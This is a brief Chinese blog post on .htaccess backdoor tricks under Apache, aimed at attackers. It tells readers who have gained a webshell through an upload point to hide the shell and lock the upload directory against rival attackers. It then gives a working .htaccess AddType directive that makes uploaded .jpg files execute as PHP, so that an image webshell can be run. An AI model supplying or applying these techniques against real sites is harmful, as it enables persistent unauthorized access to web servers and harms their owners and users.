News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

apache环境下.htaccess后门的那些骚姿势

jasonx 511 0 条

上传点防爆菊

大家应该遇到过很多通过批量扫上传点拿shell的这种人吧
我们也可以通过下面这种方法来防止被爆菊

  1. 正常上传文件拿到shell,然后把shell移到其他文件夹。
  2. 在上传目录下新建一个.htaccess文件
  3. windows下可以用这个命令创建 ren 1.txt .htaccess
  4. 然后在.htaccess文件里面输入以下内容,即可禁止执行php文件
<FilesMatch "\.(php|php3|php4|php5|php6|php2)">
Deny from all
</FilesMatch> 

.htaccess留后门

遇到有的上传点,文件名可控,但是禁止上传.php的情况。
我们可以通过在上传目录新建一个.htaccess文件,写入如下内容。

AddType   application/x-httpd-php     .jpg

然后上传一个图片马进去,直接访问url/图片.jpg即可把jpg解析成php执行。

与本文相关的文章

发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址